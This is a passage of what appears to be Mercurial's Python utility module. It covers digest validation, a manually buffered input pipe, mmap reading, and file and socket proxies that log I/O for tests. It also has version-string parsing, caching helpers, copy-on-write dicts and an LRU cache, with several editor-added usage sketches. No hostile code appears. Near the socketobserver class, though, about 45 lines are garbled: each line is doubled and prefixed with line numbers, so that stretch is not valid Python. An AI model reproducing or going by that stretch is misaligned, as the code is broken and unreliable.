    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(
                _(b'size mismatch: expected %d, got %d')
                % (self._size, self._got)
            )
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(
                    _(b'%s mismatch: expected %s, got %s')
                    % (k, v, self._digester[k])
                )


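# Editor's sketch (not part of the upstream file): validating a small
# in-memory payload with digestchecker; the md5 value is the well-known
# digest of b'foo' also shown in the digester doctest above.
def _example_digestchecker():
    payload = b'foo'
    wrapped = digestchecker(
        bytesio(payload),
        len(payload),
        {b'md5': b'acbd18db4cc2f85cedef654fccc4a4d8'},
    )
    while wrapped.read(2):
        pass
    wrapped.validate()  # raises error.Abort on a size or digest mismatch

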
try:
    buffer = buffer
except NameError:

    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset : offset + length]
        return memoryview(sliceable)[offset:]


_chunksize = 4096


class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there
        is already buffered data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        if not self._eof and self._lenbuf == 0:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with
            # a _frombuffer call that collapses it.
            self._buffer = [b''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find(b'\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find(b'\n')
        size = lfi + 1
        if lfi < 0:  # end of file
            size = self._lenbuf
        elif len(self._buffer) > 1:
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return b''
        buf = self._buffer[0]
        if len(self._buffer) > 1:
            buf = b''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data) :]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data


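# Editor's sketch (POSIX-flavored, not part of the upstream file): feeding a
# real OS pipe through bufferedinputpipe to get buffered readline() plus
# hasbuffer-based cooperation with polling.
def _example_bufferedinputpipe():
    rfd, wfd = os.pipe()
    os.write(wfd, b'first line\nsecond')
    os.close(wfd)
    pipe = bufferedinputpipe(os.fdopen(rfd, 'rb'))
    assert not pipe.hasbuffer  # nothing buffered before the first read
    assert pipe.readline() == b'first line\n'
    assert pipe.hasbuffer  # the tail of the chunk stays buffered
    assert pipe.read(6) == b'second'
    pipe.close()

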
def mmapread(fp, size=None):
    if size == 0:
        # size of 0 to mmap.mmap() means "all data"
        # rather than "zero bytes", so special case that.
        return b''
    elif size is None:
        size = 0
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return b''
        raise


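# Editor's sketch (POSIX-flavored, not part of the upstream file): mapping a
# scratch file read-only with mmapread; the payload and temp file are made up
# for the example, and slicing the returned mmap yields bytes.
def _example_mmapread():
    import tempfile

    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, b'some payload')
        os.close(fd)
        with open(path, 'rb') as fp:
            data = mmapread(fp)
            assert bytes(data[:4]) == b'some'
    finally:
        unlink(path)

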
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """

    __slots__ = (
        '_orig',
        '_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, '_orig', fh)
        object.__setattr__(self, '_observer', observer)

    def __getattribute__(self, name):
        ours = {
            '_observer',
            # IOBase
            'close',
            # closed if a property
            'fileno',
            'flush',
            'isatty',
            'readable',
            'readline',
            'readlines',
            'seek',
            'seekable',
            'tell',
            'truncate',
            'writable',
            'writelines',
            # RawIOBase
            'read',
            'readall',
            'readinto',
            'write',
            # BufferedIOBase
            # raw is a property
            'detach',
            # read defined above
            'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, '_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, '_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, '_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, '_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, '_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, '_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, '_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'close', *args, **kwargs
        )

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'fileno', *args, **kwargs
        )

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'flush', *args, **kwargs
        )

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'isatty', *args, **kwargs
        )

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readable', *args, **kwargs
        )

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readline', *args, **kwargs
        )

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readlines', *args, **kwargs
        )

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'seek', *args, **kwargs
        )

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'seekable', *args, **kwargs
        )

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'tell', *args, **kwargs
        )

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'truncate', *args, **kwargs
        )

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'writable', *args, **kwargs
        )

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'writelines', *args, **kwargs
        )

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'read', *args, **kwargs
        )

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readall', *args, **kwargs
        )

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readinto', *args, **kwargs
        )

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'write', *args, **kwargs
        )

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'detach', *args, **kwargs
        )

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'read1', *args, **kwargs
        )


class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """

    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, 'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, 'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, 'bufferedreadline', None)
        if fn:
            fn(res)

        return res


PROXIED_SOCKET_METHODS = {
    'makefile',
    'recv',
    'recvfrom',
    'recvfrom_into',
    'recv_into',
    'send',
    'sendall',
    'sendto',
    'setblocking',
    'settimeout',
    'gettimeout',
    'setsockopt',
}


class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """

    __slots__ = (
        '_orig',
        '_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, '_orig', sock)
        object.__setattr__(self, '_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, '_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, '_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, '_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, '_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, '_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, '_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, '_observedcall')(
            'makefile', *args, **kwargs
        )

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, '_observer')
        return makeloggingfileobject(
            observer.fh,
            res,
            observer.name,
            reads=observer.reads,
            writes=observer.writes,
            logdata=observer.logdata,
            logdataapis=observer.logdataapis,
        )

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recv', *args, **kwargs
        )

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recvfrom', *args, **kwargs
        )

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recvfrom_into', *args, **kwargs
        )

    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recv_into', *args, **kwargs
        )

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'send', *args, **kwargs
        )

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'sendall', *args, **kwargs
        )

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'sendto', *args, **kwargs
        )

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'setblocking', *args, **kwargs
        )

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'settimeout', *args, **kwargs
        )

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'gettimeout', *args, **kwargs
        )

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'setsockopt', *args, **kwargs
        )


class baseproxyobserver(object):
    def __init__(self, fh, name, logdata, logdataapis):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis

    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write(b'\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(b': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write(
                    b'%s> %s\n' % (self.name, stringutil.escapestr(data))
                )
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(b':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write(
                b'%s> %s\n' % (self.name, stringutil.escapestr(line))
            )
        self.fh.flush()


class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""

    def __init__(
        self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
    ):
        super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = b''

        if size == -1 and res == b'':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
            )

        data = dest[0:res] if res is not None else b''

        # _writedata() uses "in" operator and is confused by memoryview because
        # characters are ints on Python 3.
        if isinstance(data, memoryview):
            data = data.tobytes()

        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
            )

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedreadline() -> %d' % (self.name, len(res))
            )

        self._writedata(res)


def makeloggingfileobject(
    logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(
        logh,
        name,
        reads=reads,
        writes=writes,
        logdata=logdata,
        logdataapis=logdataapis,
    )
    return fileobjectproxy(fh, observer)


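# Editor's sketch (not part of the upstream file): wiring a BytesIO through
# makeloggingfileobject and reading from the proxy; the observer emits one
# log line per API call, with the payload appended because logdata=True.
def _example_makeloggingfileobject():
    log = bytesio()
    proxied = makeloggingfileobject(
        log, bytesio(b'payload'), b'example', logdata=True
    )
    proxied.read(3)
    assert log.getvalue() == b'example> read(3) -> 3: pay\n'

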
949 class socketobserver(baseproxyobserver):
949 class socketobserver(baseproxyobserver):
950 """Logs socket activity."""
950 """Logs socket activity."""
951
951
952 def __init__(
952 def __init__(
953 self,
953 self,
954 fh,
954 fh,
955 name,
955 name,
956 reads=True,
956 reads=True,
957 writes=True,
957 writes=True,
958 states=True,
958 states=True,
959 logdata=False,
959 logdata=False,
960 logdataapis=True,
960 logdataapis=True,
961 ):
961 ):
962 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
962 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
963 self.reads = reads
963 self.reads = reads
964 self.writes = writes
964 self.writes = writes
965 self.states = states
965 self.states = states
966
966
967 def makefile(self, res, mode=None, bufsize=None):
967 def makefile(self, res, mode=None, bufsize=None):
968 if not self.states:
968 if not self.states:
969 return
969 return
970
970
971 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
971 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
972
972
973 def recv(self, res, size, flags=0):
973 def recv(self, res, size, flags=0):
974 if not self.reads:
974 if not self.reads:
975 return
975 return
976
976
977 if self.logdataapis:
977 if self.logdataapis:
978 self.fh.write(
978 self.fh.write(
979 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
979 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
980 )
980 )
981 self._writedata(res)
981 self._writedata(res)
982
982
983 def recvfrom(self, res, size, flags=0):
983 def recvfrom(self, res, size, flags=0):
984 if not self.reads:
984 if not self.reads:
985 return
985 return
986
986
987 if self.logdataapis:
987 if self.logdataapis:
988 self.fh.write(
988 self.fh.write(
989 b'%s> recvfrom(%d, %d) -> %d'
989 b'%s> recvfrom(%d, %d) -> %d'
990 % (self.name, size, flags, len(res[0]))
990 % (self.name, size, flags, len(res[0]))
991 )
991 )
992
992
993 self._writedata(res[0])
        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recvfrom_into(%d, %d) -> %d'
                % (self.name, size, flags, res[0])
            )

        self._writedata(buf[0 : res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
            )

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        self.fh.write(
            b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
        )
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write(
                b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
            )

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write(
                b'%s> sendto(%d, %d, %r) -> %d'
                % (self.name, len(data), flags, address, res)
            )

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write(
            b'%s> setsockopt(%r, %r, %r) -> %r\n'
            % (self.name, level, optname, value, res)
        )


def makeloggingsocket(
    logh,
    fh,
    name,
    reads=True,
    writes=True,
    states=True,
    logdata=False,
    logdataapis=True,
):
    """Turn a socket into a logging socket."""

    observer = socketobserver(
        logh,
        name,
        reads=reads,
        writes=writes,
        states=states,
        logdata=logdata,
        logdataapis=logdataapis,
    )
    return socketproxy(fh, observer)
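

# A minimal usage sketch (illustrative, not part of the module): ``logfh``
# is a binary log file and ``sock`` a connected socket, both hypothetical.
# Every send/recv on the returned proxy is mirrored into the log with a
# ``client>`` prefix:
#
#     proxied = makeloggingsocket(logfh, sock, b'client', logdata=True)
#     proxied.sendall(b'ping')
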
def version():
    """Return version information if available."""
    try:
        from . import __version__

        return __version__.version
    except ImportError:
        return b'unknown'


def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
    if not m:
        vparts, extra = b'', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    assert vparts is not None  # help pytype

    vints = []
    for i in vparts.split(b'.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)


def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keyword args
    if func.__code__.co_argcount == 0:
        listcache = []

        def f():
            if len(listcache) == 0:
                listcache.append(func())
            return listcache[0]

        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]

    else:

        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f
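

# A minimal usage sketch for cachefunc (illustrative, not part of the
# module; ``expensive`` is a hypothetical callable). Repeated calls with
# the same argument hit the cache instead of re-running the function:
#
#     >>> calls = []
#     >>> def expensive(x):
#     ...     calls.append(x)
#     ...     return x * 2
#     >>> cached = cachefunc(expensive)
#     >>> cached(21), cached(21)
#     (42, 42)
#     >>> calls  # the wrapped function ran only once
#     [21]
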
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self


class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    >>> d1.insert(1, b'a.5', 0.5)
    >>> d1
    sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = pycompat.iteritems(src)
            for k, v in src:
                self[k] = v

    def insert(self, position, key, value):
        for (i, (k, v)) in enumerate(list(self.items())):
            if i == position:
                self[key] = value
            if i >= position:
                del self[k]
                self[k] = v


class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """


class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """


class transactional(object):  # pytype: disable=ignored-metaclass
    """Base class for making a transactional type into a context manager."""

    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()
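

# A minimal sketch of a transactional subclass (illustrative only;
# ``filetransaction`` is a hypothetical example, not a Mercurial type).
# Used as a context manager, close() runs only on the success path and
# release() always runs, aborting if close() never happened:
#
#     >>> class filetransaction(transactional):
#     ...     closed = False
#     ...     def close(self):
#     ...         self.closed = True
#     ...     def release(self):
#     ...         if not self.closed:
#     ...             print('aborted')
#     >>> with filetransaction() as tr:
#     ...     pass
#     >>> tr.closed
#     True
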
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()


@contextlib.contextmanager
def nullcontextmanager():
    yield


class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """

    __slots__ = ('next', 'prev', 'key', 'value', 'cost')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None
        self.cost = 0

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0


class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new node. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """

    def __init__(self, max, maxcost=0):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            self.totalcost -= node.cost
            del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        self.pop(k)

    def pop(self, k, default=_notset):
        try:
            node = self._cache.pop(k)
        except KeyError:
            if default is _notset:
                raise
            return default

        assert node is not None  # help pytype
        value = node.value
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

        return value

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def peek(self, k, default=_notset):
        """Get the specified item without moving it to the head

        Unlike get(), this doesn't mutate the internal state. But be aware
        that it doesn't mean peek() is thread safe.
        """
        try:
            node = self._cache[k]
            return node.value
        except KeyError:
            if default is _notset:
                raise
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

